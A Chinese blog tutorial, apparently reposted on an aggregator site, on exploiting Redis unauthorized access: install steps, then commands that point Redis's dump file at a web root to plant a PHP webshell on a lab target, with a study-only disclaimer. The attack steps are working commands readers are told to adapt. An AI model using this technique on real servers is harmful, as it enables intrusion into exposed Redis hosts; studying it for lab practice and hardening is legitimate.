热门标签
热门文章
- 1el-table的使用技巧(ElementUI)_el-table 的 top是什么意思
- 2【大数据Hive】hive 多字段分隔符使用详解_hive数据连接分隔符
- 3sqlserver中的循环遍历(普通循环和游标循环)_sqlserver 循环
- 4出现Error: Could not open client transport with JDBC Uri: jdbc:hive2://node02:10000/;user=root:..怎么办?
- 5生命在于学习——未授权访问漏洞_rabbitmq漏洞
- 6让GPT成为护理专家 - 护士的工作如此简单_usage of gradio.inputs is deprecated, and will not
- 7mysql删除语句-delete_mysqldelete删除语句
- 8【无标题】_大厂机试是acm吗
- 9寒假学习笔记_使用定时器2产生1s的定时,定时器时钟tim_clk为72m。要求不使用预分频寄存器,
- 10智能制造:MES实现自动化、数字化、智能化管理_mes智能化生产
当前位置: article > 正文
数据库服务类--Redis--未授权访问&终端Getshell
作者:IT小白 | 2024-04-27 12:00:57
赞
踩
数据库服务类--Redis--未授权访问&终端Getshell
免责声明:本文仅做技术交流与学习.
目录
redis--->webshell
Redis未授权访问漏洞复现与利用 - 知乎 (zhihu.com)
前提条件:
端口开放(6379)
目录结构清晰
windows上开启redis服务:
- windows:
- redis-server.exe redis.windows.conf
- redis-cli.exe -h 127.0.0.1 -p 6379
Linux上创建&开启redis服务:
- 1、下载
- wget http://download.redis.io/releases/redis-2.8.17.tar.gz
-
- 2、解压编译
- tar xzvf redis-2.8.17.tar.gz #解压安装包
- cd redis-2.8.17 # 进入redis目录
- make #编译
-
- 3、配置及启动
- cd src/ #进入src目录
- cp redis-server /usr/bin/
- cp redis-cli /usr/bin/ #将redis-server和redis-cli拷贝到/usr/bin目录下(这样启动redis-server和redis-cli就不用每次都进入安装目录了)
- cd .. # 返回上一级目录
- cp redis.conf /etc/ #将redis.conf拷贝到/etc/目录下
- redis-server /etc/redis.conf # 使用/etc/目录下的redis.conf文件中的配置启动redis服务
操作:
1-连接靶机redis
2-写入webshell
- config set dir /www/wwwroot/IP
- config set dbfilename test.php
- set test "<?phpphpinfo();?>"
- bgsave
- save
目录,文件名自己改
写入内容自己改...
3-访问后门路径
--上线...
声明:本文内容由网友自发贡献,不代表【wpsshop博客】立场,版权归原作者所有,本站不承担相应法律责任。如您发现有侵权的内容,请联系我们。转载请注明出处:https://www.wpsshop.cn/w/IT小白/article/detail/496628
推荐阅读
相关标签
